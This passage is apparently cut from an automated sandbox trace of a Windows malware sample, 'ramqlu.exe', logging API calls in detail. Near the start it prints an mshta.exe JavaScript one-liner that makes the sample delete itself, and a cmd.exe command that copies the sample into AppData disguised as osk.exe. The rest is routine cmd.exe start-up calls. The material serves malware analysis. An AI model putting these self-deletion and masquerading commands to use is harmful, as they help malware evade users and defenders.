SysReAllocStringLen (in: pbstr=0x18fdb4*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", len=0x97 | out: pbstr=0x18fdb4*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 1 [0059.443] SysReAllocStringLen (in: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", len=0x97 | out: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 1 [0059.443] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpStartupInfo=0x18fdd0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fdc0 | out: lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", lpProcessInformation=0x18fdc0*(hProcess=0x174, hThread=0x12c, dwProcessId=0x358, dwThreadId=0x90)) returned 1 [0059.515] ExitProcess (uExitCode=0x0) Thread: id = 7 os_tid = 0x7ac Thread: id = 9 os_tid = 0x408 Thread: id = 10 os_tid = 0x738 Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x47261000" os_pid = "0x7d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7c4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x40c [0058.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffdbc | out: lpSystemTimeAsFileTime=0x3ffdbc*(dwLowDateTime=0xed7beaa0, dwHighDateTime=0x1d61645)) [0058.230] GetCurrentProcessId () returned 0x7d4 [0058.230] GetCurrentThreadId () returned 0x40c [0058.230] GetTickCount () returned 0x11475dc [0058.230] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffdb4 | out: lpPerformanceCount=0x3ffdb4*=17858459112) returned 1 [0058.232] GetModuleHandleA (lpModuleName=0x0) returned 0x4a730000 [0058.232] __set_app_type (_Type=0x1) [0058.232] __p__fmode () returned 0x770331f4 [0058.232] __p__commode () returned 0x770331fc [0058.232] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7521a6) returned 0x0 [0058.232] __getmainargs (in: _Argc=0x4a754238, _Argv=0x4a754240, _Env=0x4a75423c, _DoWildCard=0, _StartInfo=0x4a754140 | out: _Argc=0x4a754238, _Argv=0x4a754240, _Env=0x4a75423c) returned 0 [0058.233] GetCurrentThreadId () returned 0x40c [0058.233] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x40c) returned 0x60 [0058.233] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.233] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0058.233] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.233] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0058.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ffd4c | out: phkResult=0x3ffd4c*=0x0) returned 0x2 [0058.234] VirtualQuery (in: lpAddress=0x3ffd83, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0058.234] GetConsoleOutputCP () returned 0x1b5 [0058.234] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a754260 | out: lpCPInfo=0x4a754260) returned 1 [0058.234] SetConsoleCtrlHandler (HandlerRoutine=0x4a74e72a, Add=1) returned 1 [0058.234] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.234] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0058.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7541ac | out: lpMode=0x4a7541ac) returned 1 [0058.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.235] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.235] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.235] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7541b0 | out: lpMode=0x4a7541b0) returned 1 [0058.236] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.236] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0058.236] GetEnvironmentStringsW () returned 0x4b2168* [0058.236] GetProcessHeap () returned 0x4a0000 [0058.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xaca) returned 0x4b2c40 [0058.236] FreeEnvironmentStringsW (penv=0x4b2168) returned 1 [0058.236] GetProcessHeap () returned 0x4a0000 [0058.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x4) returned 0x4b1850 [0058.236] GetEnvironmentStringsW () returned 0x4b2168* [0058.236] GetProcessHeap () returned 0x4a0000 [0058.237] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xaca) returned 0x4b3718 [0058.237] FreeEnvironmentStringsW (penv=0x4b2168) returned 1 [0058.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fecbc | out: phkResult=0x3fecbc*=0x68) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x0, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x0, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.237] RegCloseKey (hKey=0x68) returned 0x0 [0058.237] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fecbc | out: phkResult=0x3fecbc*=0x68) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x0, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x9, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x9, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x9, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.238] RegCloseKey (hKey=0x68) returned 0x0 [0058.238] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c0 [0058.238] srand (_Seed=0x5e9c43c0) [0058.238] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0058.238] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0058.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a755260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.239] GetProcessHeap () returned 0x4a0000 [0058.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x210) returned 0x4b2168 [0058.239] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b2170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0058.239] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0058.239] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.239] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.239] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0058.239] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0058.239] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0058.239] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0058.239] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0058.239] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0058.239] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0058.239] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0058.239] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0058.239] GetProcessHeap () returned 0x4a0000 [0058.239] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b2c40 | out: hHeap=0x4a0000) returned 1 [0058.240] GetEnvironmentStringsW () returned 0x4b2380* [0058.240] GetProcessHeap () returned 0x4a0000 [0058.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xae2) returned 0x4b4ce0 [0058.240] FreeEnvironmentStringsW (penv=0x4b2380) returned 1 [0058.240] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.240] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.240] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0058.240] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0058.240] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0058.240] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0058.241] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0058.241] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0058.241] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0058.241] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0058.241] GetProcessHeap () returned 0x4a0000 [0058.241] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x30) returned 0x4b1fe8 [0058.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ffa88 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3ffa88, lpFilePart=0x3ffa84 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3ffa84*="system32") returned 0x13 [0058.241] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0058.241] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3ff804 | out: lpFindFileData=0x3ff804*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x4b57d0 [0058.241] FindClose (in: hFindFile=0x4b57d0 | out: hFindFile=0x4b57d0) returned 1 [0058.241] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3ff804 | out: lpFindFileData=0x3ff804*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x4a0ff0 [0058.242] FindClose (in: hFindFile=0x4a0ff0 | out: hFindFile=0x4a0ff0) returned 1 [0058.242] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0058.242] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0058.242] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4ce0 | out: hHeap=0x4a0000) returned 1 [0058.242] GetEnvironmentStringsW () returned 0x4b41f0* [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xb12) returned 0x4b4d10 [0058.242] FreeEnvironmentStringsW (penv=0x4b41f0) returned 1 [0058.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a755260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b1fe8 | out: hHeap=0x4a0000) returned 1 [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x400e) returned 0x4b5830 [0058.243] GetProcessHeap () returned 0x4a0000 [0058.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xf2) returned 0x4a0ff0 [0058.243] GetProcessHeap () returned 0x4a0000 [0058.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5830 | out: hHeap=0x4a0000) returned 1 [0058.243] GetConsoleOutputCP () returned 0x1b5 [0058.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a754260 | out: lpCPInfo=0x4a754260) returned 1 [0058.243] GetUserDefaultLCID () returned 0x409 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a754950, cchData=8 | out: lpLCData=":") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ffbc8, cchData=128 | out: lpLCData="0") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ffbc8, cchData=128 | out: lpLCData="0") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ffbc8, cchData=128 | out: lpLCData="1") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a754940, cchData=8 | out: lpLCData="/") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a754d80, cchData=32 | out: lpLCData="Mon") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a754d40, cchData=32 | out: lpLCData="Tue") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a754d00, cchData=32 | out: lpLCData="Wed") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a754cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a754c80, cchData=32 | out: lpLCData="Fri") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a754c40, cchData=32 | out: lpLCData="Sat") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a754c00, cchData=32 | out: lpLCData="Sun") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a754930, cchData=8 | out: lpLCData=".") returned 2 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a754920, cchData=8 | out: lpLCData=",") returned 2 [0058.245] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0058.247] GetProcessHeap () returned 0x4a0000 [0058.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20c) returned 0x4b2ea0 [0058.247] GetConsoleTitleW (in: lpConsoleTitle=0x4b2ea0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.247] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.247] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0058.247] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0058.247] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0058.248] GetProcessHeap () returned 0x4a0000 [0058.248] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x400a) returned 0x4b5830 [0058.248] GetProcessHeap () returned 0x4a0000 [0058.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5830 | out: hHeap=0x4a0000) returned 1 [0058.248] _wcsicmp (_String1="copy", _String2=")") returned 58 [0058.248] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0058.248] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0058.248] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0058.248] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0058.248] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0058.248] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0058.249] GetProcessHeap () returned 0x4a0000 [0058.249] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x58) returned 0x4a10f0 [0058.249] GetProcessHeap () returned 0x4a0000 [0058.249] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4a1150 [0058.252] GetProcessHeap () returned 0x4a0000 [0058.252] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xe6) returned 0x4a1170 [0058.253] GetConsoleTitleW (in: lpConsoleTitle=0x3ff8c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.253] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0058.253] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0058.253] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0058.253] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0058.253] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0058.253] GetProcessHeap () returned 0x4a0000 [0058.253] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c4) returned 0x4b30b8 [0058.254] GetProcessHeap () returned 0x4a0000 [0058.254] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b30b8, Size=0xe8) returned 0x4b30b8 [0058.254] GetProcessHeap () returned 0x4a0000 [0058.254] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b30b8) returned 0xe8 [0058.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.255] GetProcessHeap () returned 0x4a0000 [0058.255] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xf0) returned 0x4b31a8 [0058.256] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a755260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.256] GetProcessHeap () returned 0x4a0000 [0058.256] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4a1260 [0058.256] GetProcessHeap () returned 0x4a0000 [0058.256] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4b32a0 [0058.256] GetProcessHeap () returned 0x4a0000 [0058.256] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4a1298 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", 